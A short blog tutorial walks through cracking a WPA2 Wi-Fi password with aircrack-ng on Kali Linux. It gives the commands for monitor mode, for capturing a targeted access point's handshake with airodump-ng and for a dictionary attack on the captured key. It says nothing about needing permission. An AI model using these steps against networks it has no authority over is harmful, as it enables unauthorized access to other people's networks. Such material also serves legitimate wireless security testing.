This post describes the step-by-step process of cracking WPA2 wifi Access-point using Kali Linux’s tool air-crack.
Install OS and Aircrack tool:
First step is to have Kali Linux installed on your system (preferably because aircrack-ng comes pre-installed in it) or any other Linux OS along with aircrack-ng installed.
Check your Wireless Card’s injection capability:
It’s better if you have a wireless card’s chip-set which supports injection capability (i haven’t tried with normal card). This “link” on aircrack’s website discusses this issue in detail.
Put your card in Monitor Mode:
Now put your card into monitor mode by using the following command:
airmon-ng start wlan0
where wlan0 is the logical name of your wireless card. You can check it using the command:
which will show in detail the status of your wireless card.
Check available wifi connections:
You can check all the available wifi connections by typing the following command:
airodump-ng start wlan0mon
where “wlan0mon” is the logical name of the connection after it’s put in monitor mode.
Listen to your targeted connection:
Now you can listen to your targeted access point (which you found in the previous step) by the following command:
airodump-ng -c 9 –bssid 00:00:11:11:22:22 -w psk wlan0mon
-c means channel is specified after it.
9 is the number of channel.
–bssid means the MAC address of Access point is described after it.
00:00:11:11:22:22 is the BSSID or MAC address of the targeted Accesses Point.
-w means write the information in file mentioned after it.
psk name of the file to save data in.
wlan0mon the logical name of your wireless card.
After this the terminal will show the airodump data but only of the specified Access point. Now you’ll have to wait until a message appears:
WPA handshake: 00:00:11:11:22:22
This will appear when a user gets connected with the access point (a complete hand shake).
Run aircrack-ng to crack the pre-shared key:
After you get the above mentioned message, you have the hash value of the pre-shared key. Now you can run the following command to try to crack that hash value:
aircrack-ng -w dictionaryFile -b 00:00:11:11:22:22 psk*.cap
-w is used to specify the dictionary file.
dictionaryFile is the name of the file(along with location) of the dictionary.
-b is used to indicate the next MAC address of the Access point (BSSID value).
00:00:11:11:22:22 is the mac address of your targeted Access point.
psk*.cap is used for listing all the files with names starting from “psk” and of .cap extension.
Now you’ll see the aircrack tool trying to crack your pre-shared key using the dictionary. With some luck (if the pre-shared key is in the dictionary) and some processing (on your processor’s part) you’ll have the pre-shared key.
I will soon add the links to the related guides for using the linux tools and linux environment(e.g. getting a dictionary or finding already available ones). My main content was taken from the Aircrack’s website.
See you guys soon.